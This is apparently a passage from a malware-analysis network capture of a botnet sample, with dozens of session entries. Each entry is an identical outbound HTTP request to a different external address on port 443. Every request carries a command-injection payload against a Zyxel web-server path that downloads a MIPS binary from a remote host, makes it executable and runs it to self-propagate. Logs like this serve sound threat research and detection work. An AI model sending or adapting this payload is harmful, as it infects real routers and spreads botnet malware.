                                                      Feb 2, 2024 06:35:38.329073906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      703192.168.2.1451274165.145.217.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329116106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      704192.168.2.1451988196.246.61.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329204082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      705192.168.2.1450104174.86.132.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329288006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      706192.168.2.1451354173.180.194.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329336882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      707192.168.2.1436400183.87.166.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329396963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      708192.168.2.1460316150.102.219.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329452038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      709192.168.2.144495452.127.233.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329530001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      710192.168.2.145245223.56.247.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329561949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      711192.168.2.145821282.17.60.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329602957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      712192.168.2.146064072.24.239.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329658985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      713192.168.2.144039024.18.111.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329709053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      714192.168.2.1456210152.179.41.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329791069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      715192.168.2.1436946169.226.71.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329864025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      716192.168.2.144469091.208.179.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329910994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      717192.168.2.144820490.4.182.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.329936981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      718192.168.2.1457408200.151.108.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330019951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      719192.168.2.1459760182.161.10.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330065012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      720192.168.2.143726675.230.70.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330127001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      721192.168.2.145035223.116.20.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330168962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      722192.168.2.14530344.250.70.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330209017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      723192.168.2.1443752190.92.186.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330281019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      724192.168.2.143902247.154.10.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330318928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      725192.168.2.143318040.14.235.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330388069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      726192.168.2.143430660.38.241.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330451965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      727192.168.2.14387184.117.146.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330566883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      728192.168.2.1457794117.111.83.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330601931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      729192.168.2.1459554157.46.104.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330611944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      730192.168.2.1448914183.76.206.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330684900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      731192.168.2.144165043.98.114.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330737114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      732192.168.2.1441958143.30.67.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330777884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      733192.168.2.145304643.118.70.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330838919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      734192.168.2.1449458209.27.197.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330910921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      735192.168.2.145898234.146.170.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.330955029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      736192.168.2.1450038211.219.236.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331015110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      737192.168.2.146025257.92.10.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331079960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      738192.168.2.1456204205.25.12.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331137896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      739192.168.2.145962848.145.175.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331187963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      740192.168.2.14425729.174.188.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331252098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      741192.168.2.144701688.213.35.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331295967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      742192.168.2.145648432.37.248.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331382990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      743192.168.2.144264282.117.133.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331406116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      744192.168.2.1443814188.2.253.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331471920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      745192.168.2.144523871.62.156.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331515074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      746192.168.2.1460404194.169.26.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331566095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      747192.168.2.143636672.164.156.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331599951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      748192.168.2.1455046142.178.28.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331671953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      749192.168.2.1449780161.178.44.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331723928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      750192.168.2.1459736221.143.206.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331779003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      751192.168.2.1444570167.213.208.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331809998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      752192.168.2.1451224134.196.217.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331892014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      753192.168.2.144185689.146.197.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.331940889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      754192.168.2.1454868193.82.117.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332004070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      755192.168.2.145398462.197.238.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332060099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      756192.168.2.145603876.242.160.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332123995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      757192.168.2.144083634.218.249.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332149982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      758192.168.2.144354839.11.122.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332201958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      759192.168.2.144796649.187.228.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332278967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      760192.168.2.144885647.254.236.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332338095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      761192.168.2.1456352181.165.104.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332396984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      762192.168.2.143381638.209.251.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332453012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      763192.168.2.1451594135.58.223.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332510948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      764192.168.2.1454802114.141.194.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:38.332546949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      765192.168.2.1448008203.62.187.43443
                                                      TimestampBytes transferredDirectionData
